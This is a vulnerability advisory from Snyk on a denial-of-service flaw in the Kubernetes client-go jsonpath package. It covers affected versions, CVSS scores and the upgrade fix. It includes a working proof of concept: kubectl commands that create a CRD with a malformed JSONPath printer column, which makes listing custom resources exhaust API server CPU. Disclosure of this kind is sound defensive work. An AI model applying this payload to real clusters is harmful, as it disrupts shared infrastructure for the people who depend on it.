Denial of Service (DoS) Affecting github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4


Severity

Recommended
0.0
low
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-GOLANG-GITHUBCOMKUBERNETESKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597670
  • published 24 Jul 2020
  • disclosed 24 Jul 2020
  • credit lazydog

Introduced: 24 Jul 2020

CVE NOT AVAILABLE CWE-400 Open this link in a new tab

How to fix?

Upgrade github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.

Overview

github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is an is a template engine using jsonpath syntax, which can be seen at http://goessner.net/articles/JsonPath/. In addition, it has {range} {end} function to iterate list and slice.

Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing CRs will cause enormous amounts of CPU usage on the API server.

PoC

kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
  1. kubectl get foo

The API server CPU usage significantly increases

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
3.5 low
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    Low
  • User Interaction (UI)
    Required
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    Low